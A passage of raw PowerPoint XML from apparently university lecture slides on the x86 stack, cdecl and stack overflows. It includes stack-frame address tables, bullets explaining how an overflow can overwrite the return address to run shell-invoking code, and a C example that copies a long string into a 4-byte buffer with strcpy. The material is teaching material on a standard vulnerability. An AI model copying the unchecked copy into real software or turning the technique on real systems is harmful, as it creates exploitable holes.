                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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143</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0x33</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0xa</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0xfd2c0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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c5</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="525267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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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30915735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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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144</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0x33</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0xa</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0xfd2d4</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0xfd2c0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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c5</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="525267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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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2778601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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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145</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0x33</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0xa</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0xfd2d4</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0xfd2c0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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c5</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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="525267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27714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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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6830080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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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0x33</a:t>
                      </a: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0x28</a:t>
                      </a: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6"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483bf</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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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146</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0x33</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Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xa</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0xfd2d4</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0xfd2c0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latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x80483c6</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0xfd2d0</a:t>
            </a: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0xfd2b4</a:t>
            </a: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0xfd2b0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4593806" y="552699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27714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2" name="TextBox 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826432" y="849799"/>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0xfd2cc</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19190095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42" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stack Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436243" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is copied without checking boundaries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data "overflows" a pre-allocated buffer and overwrites the return address (or other parts of the frame)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normally this causes a segmentation fault</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly crafted, it is possible overwrite the return address with a user-defined value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to cause a jump to user-defined code (e.g., code that invokes a shell)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code may be part of the overflowing data (or not)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The code will be executed with the privileges of the running program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="68603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6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6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6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62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62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624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62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 of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Saved EBP and saved EIP are stored on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What prevents a program/function from writing/changing those values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What would happen if they did?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>148</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147790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954" y="305134"/>
            <a:ext cx="4229810" cy="5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>149</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="29782"/>
            <a:ext cx="5832763" cy="666795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900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
